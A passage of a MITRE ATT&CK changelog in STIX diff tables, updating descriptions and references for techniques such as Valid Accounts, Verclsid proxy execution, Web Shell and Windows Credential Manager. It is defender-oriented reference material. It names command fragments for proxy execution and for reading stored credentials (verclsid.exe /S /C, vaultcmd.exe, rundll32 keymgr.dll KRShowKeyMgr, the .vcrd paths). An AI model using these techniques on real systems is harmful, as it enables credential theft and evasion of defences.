legitimate access those credentials provide to make it harder to detect their presence. In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare) The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-560 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 03:29:48.018000+00:00 | 2022-10-19 19:57:39.849000+00:00 |
| description | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.<br>In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare) The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft) |
| external_references[1]['source_name'] | capec | volexity_0day_sophos_FW |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/560.html | https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ |
| external_references[2]['source_name'] | TechNet Credential Theft | CISA MFA PrintNightmare |
| external_references[2]['description'] | Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. | Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022. |
| external_references[2]['url'] | https://technet.microsoft.com/en-us/library/dn535501.aspx | https://www.cisa.gov/uscert/ncas/alerts/aa22-074a |
| external_references[3]['source_name'] | TechNet Audit Policy | TechNet Credential Theft |
| external_references[3]['description'] | Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. | Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. |
| external_references[3]['url'] | https://technet.microsoft.com/en-us/library/dn487457.aspx | https://technet.microsoft.com/en-us/library/dn535501.aspx |
| x_mitre_defense_bypassed[1] | Host intrusion prevention systems | Anti-virus |
| x_mitre_defense_bypassed[2] | Network intrusion detection system | Host Intrusion Prevention Systems |
| x_mitre_defense_bypassed[3] | Application control | Network Intrusion Detection System |
| x_mitre_defense_bypassed[4] | System access controls | Application Control |
| x_mitre_defense_bypassed[5] | Anti-virus | System Access Controls |
| x_mitre_detection | Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. | Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account.<br>Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. |
| x_mitre_version | 2.3 | 2.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet Audit Policy', 'description': 'Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/dn487457.aspx'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/560.html', 'external_id': 'CAPEC-560'} | |
| x_mitre_contributors | Syed Ummar Farooqh, McAfee | |
| x_mitre_contributors | Prasad Somasamudram, McAfee | |
| x_mitre_contributors | Sekhar Sarukkai, McAfee | |
| x_mitre_data_sources | Logon Session: Logon Session Creation | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Logon Session: Logon Session Creation |
| Old Description | New Description |
|---|---|
| Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe) Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) | Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)<br>Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-08-19 19:29:18.138000+00:00 | 2022-05-20 17:35:28.221000+00:00 |
| description | Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)<br>Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) | Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)<br>Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) |
| external_references[1]['source_name'] | WinOSBite verclsid.exe | BOHOPS Abusing the COM Registry |
| external_references[1]['description'] | verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020. | BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020. |
| external_references[1]['url'] | https://www.winosbite.com/verclsid-exe/ | https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ |
| external_references[2]['source_name'] | LOLBAS Verclsid | Red Canary Verclsid.exe |
| external_references[2]['description'] | LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020. | Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020. |
| external_references[2]['url'] | https://lolbas-project.github.io/lolbas/Binaries/Verclsid/ | https://redcanary.com/blog/verclsid-exe-threat-detection/ |
| external_references[3]['source_name'] | Red Canary Verclsid.exe | LOLBAS Verclsid |
| external_references[3]['description'] | Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020. | LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020. |
| external_references[3]['url'] | https://redcanary.com/blog/verclsid-exe-threat-detection/ | https://lolbas-project.github.io/lolbas/Binaries/Verclsid/ |
| external_references[4]['source_name'] | BOHOPS Abusing the COM Registry | Nick Tyrer GitHub |
| external_references[4]['description'] | BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020. | Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020. |
| external_references[4]['url'] | https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ | https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 |
| external_references[5]['source_name'] | Nick Tyrer GitHub | WinOSBite verclsid.exe |
| external_references[5]['description'] | Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020. | verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020. |
| external_references[5]['url'] | https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 | https://www.winosbite.com/verclsid-exe/ |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen. In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-14 19:40:47.644000+00:00 | 2022-03-15 20:06:04.793000+00:00 |
| x_mitre_data_sources[0] | Process: OS API Execution | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Linux |
| Old Description | New Description |
|---|---|
| Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. | Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API.<br>Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking ) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 21:03:21.051000+00:00 | 2022-03-07 19:43:49.315000+00:00 |
| description | Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. | Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API.<br>Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking ) |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Default VBS macros Blocking ', 'description': 'Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.', 'url': 'https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805'} | |
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) | Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['SYSTEM', 'User'] | |
| external_references | CAPEC-650 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-26 13:46:47.993000+00:00 | 2022-10-19 20:11:07.800000+00:00 |
| description | Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) | Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) |
| external_references[1]['source_name'] | capec | NSA Cyber Mitigating Web Shells |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/650.html | https://github.com/nsacyber/Mitigating-Web-Shells |
| external_references[2]['source_name'] | Lee 2013 | volexity_0day_sophos_FW |
| external_references[2]['description'] | Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. | Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html | https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ |
| external_references[3]['source_name'] | NSA Cyber Mitigating Web Shells | Lee 2013 |
| external_references[3]['description'] | NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021. | Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. |
| external_references[3]['url'] | https://github.com/nsacyber/Mitigating-Web-Shells | https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html |
| x_mitre_data_sources[0] | File: File Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Process: Process Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Application Log: Application Log Content |
| x_mitre_data_sources[4] | Network Traffic: Network Traffic Flow | File: File Creation |
| x_mitre_data_sources[5] | Application Log: Application Log Content | Process: Process Creation |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/650.html', 'external_id': 'CAPEC-650'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker) The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker. Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault) Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) |
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be abused to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.
Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-29 21:00:18.973000+00:00 | 2022-10-21 15:46:55.929000+00:00 |
| description | Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) |
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be abused to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.
Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) |
| external_references[1]['source_name'] | Microsoft Credential Manager store | Malwarebytes The Windows Vault |
| external_references[1]['description'] | Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020. | Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020. |
